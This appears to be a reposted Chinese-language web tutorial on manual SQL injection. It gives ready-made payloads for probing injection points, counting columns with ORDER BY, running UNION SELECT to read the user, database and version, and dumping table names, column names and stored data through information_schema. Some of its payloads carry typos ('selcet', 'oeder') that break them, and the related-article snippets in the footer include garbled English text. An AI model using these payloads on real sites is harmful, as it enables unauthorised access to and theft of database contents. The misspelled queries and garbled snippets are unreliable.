SQL

一起聊聊簡單的sql手工注入過程

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jan 28, 2022 pm 05:02 PM

sql

這篇文章為大家帶來了關於sql中手工注入的相關問題，其中包括判斷注入點以及判斷注入類型的相關問題，希望對大家有幫助。

一起聊聊簡單的sql手工注入過程

判斷注入點

1.單引號法：直接在網址後面加上一個單引號，如果頁面無法正常顯示，瀏覽器回傳一些異常訊息，則表示該連結可能存在sql注入漏洞

2.1=1和1=2：在網址後面的get傳參加上and 1=1 ，顯示正常，把1=1替換為1 =2，顯示異常，表示網頁存在sql注入。

判斷注入型別

1.數字型注入：注入變數的值不需要用引號引起來，如

select * from user where id=$id;

2.字元型注入：注入變數會用引號包裹起來，如`

select * from user where username='$username';`

注入時注意要閉合引號。
3.搜尋型注入：

select * from user where username like '%$pass%';

把sql語句建構成

select * from user where username like '%$pass%' union select语句 '%%'；

即傳輸的變數為 pass%’ union select語句 '% 形成閉合。

判斷注入點提交方式

透過抓包等方式判斷注入點的提交方式是get,post,還是cookie。

使用order by 查詢字段

使用order by 語句可以查詢出資料庫有多少個字段，可以透過不斷的嘗試來確定資料庫字段數量，如在輸入oeder by 9時，頁面報錯而輸入order by 8時頁面顯示正常，即資料庫中有8個欄位。
如查詢語句為：select * from user where id='$id';
可以建構下面的輸入：(id = ') ' order by 3 ' --
即查詢語句為：select * from user where id='' order by 3 '--'

使用聯合查詢來查詢目前資料庫、使用者、版本資訊

使用union select 語句來查詢目前使用使用者user() ，資料庫database() ,資料庫版本version() ，伺服器作業系統的@@version_compile_os等資訊
version版本十分重要，如果版本在5.0以上，就可以使用information_schema函式庫輕易的查詢想要的資訊
建構語句：

select * from user where id='' union select user(),database(),version()+--+;

查詢目前資料庫中的表，列和值

#5.0 版本以上的mysql資料庫自帶的information_schema函式庫中儲存著資料庫中所有的表名和列明資訊。
下面我們就應該根據第五步驟查詢的目前資料庫的結果（如資料庫為database_1）名下所有的表名tables的資訊。
Information_schema.tables ：記錄著資料庫中所有表名資訊的表。
建構的查詢語句如下：

Select * from user where id='' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database_1;--

查詢的結果為：第五步驟查詢的目前資料庫中的表名資訊。
Information_schema.columns：記錄資料庫中所有的表中的列名資訊；
下面就應該根據上面查詢得到的表名資訊(如表為table_1)查詢他的列名信息，建構語句如下：

Select * from user where id='' union selcet 1,group_concat(column_name),3 from information_schema.columns where table_name=table_1;--

查詢出列名後，就可以直接透過聯合查詢查出表中儲存的資訊（如查出的列名為column_1,column_2）建構語句

Selcet * from user where id='' union select 1,column_1,column_2 from tables;--

即可查詢指定資料庫指定表格的儲存資料

推薦學習：mysql影片教學

以上是一起聊聊簡單的sql手工注入過程的詳細內容。更多資訊請關注PHP中文網其他相關文章！

陳述

本文轉載於：CSDN。如有侵權，請聯絡admin@php.cn刪除

OLTP與OLAP：那大數據呢？May 14, 2025 am 12:06 AM

Oltpandolaparebothestential forbigdata：oltphandlesleal-timetransactions，whereLapanalyzeslargedAtasetset.1）Oltprequirescalingcalingtechnologieslikenosqlforbigdata

SQL中的模式匹配是什麼？它如何工作？May 13, 2025 pm 04:09 PM

patternMatchingInsqlusestHelikeOperatorAndRegulareSearchSearchForceSearchPatterns.itenablesflexibledataqueryingwithWildCardslike％and_，andregexforcomplexmatches.it'sversatilebutrequirescarefuilusetetoetoetoavovoidperformanceSissUseSissUseSuseSuseSuseSuseSuseSuseSuseSuseSuseSuseSuseDoveruse。

學習SQL：了解挑戰和獎勵May 11, 2025 am 12:16 AM

學習SQL需要掌握基礎知識、核心查詢、複雜JOIN操作和性能優化。 1.理解表、行、列等基本概念和不同SQL方言。 2.熟練使用SELECT語句進行查詢。 3.掌握JOIN操作從多表獲取數據。 4.優化查詢性能，避免常見錯誤，使用索引和EXPLAIN命令。

SQL：揭示其目的和功能May 10, 2025 am 12:20 AM

SQL的核心概念包括CRUD操作、查詢優化和性能提升。 1)SQL用於管理和操作關係數據庫，支持CRUD操作。 2)查詢優化涉及解析、優化和執行階段。 3)性能提升可以通過使用索引、避免SELECT*、選擇合適的JOIN類型和分頁查詢實現。

SQL安全最佳實踐：保護數據庫免受漏洞May 09, 2025 am 12:23 AM

防止SQL注入的最佳實踐包括：1)使用參數化查詢，2)輸入驗證，3)最小權限原則，4)使用ORM框架。通過這些方法，可以有效保護數據庫免受SQL注入和其他安全威脅。

MySQL：SQL的實際應用May 08, 2025 am 12:12 AM

MySQL受歡迎的原因是其性能卓越且易於使用和維護。 1.創建數據庫和表：使用CREATEDATABASE和CREATETABLE命令。 2.插入和查詢數據：通過INSERTINTO和SELECT語句操作數據。 3.優化查詢：使用索引和EXPLAIN語句提升性能。

比較SQL和MySQL：語法和功能May 07, 2025 am 12:11 AM

SQL和MySQL的區別與聯繫如下：1.SQL是標準語言，用於管理關係數據庫，MySQL是基於SQL的數據庫管理系統。 2.SQL提供基本CRUD操作，MySQL在此基礎上增加了存儲過程、觸發器等功能。 3.SQL語法標準化，MySQL在某些地方有改進，如LIMIT用於限制返回行數。 4.使用示例中，SQL和MySQL的查詢語法略有不同，MySQL的JOIN和GROUPBY更直觀。 5.常見錯誤包括語法錯誤和性能問題，MySQL的EXPLAIN命令可用於調試和優化查詢。

SQL：初學者指南 - 學習容易嗎？May 06, 2025 am 12:06 AM

sqlisytolearnforbeginnersduetoitsstraightStraightSandAxandBasicCoperations，butmasteringItInVolvesComplexConcepts.1）startwithSimplequeriesLikeSlect，Insert，inters，Update，Update，update，deasts，delete.2）

See all articles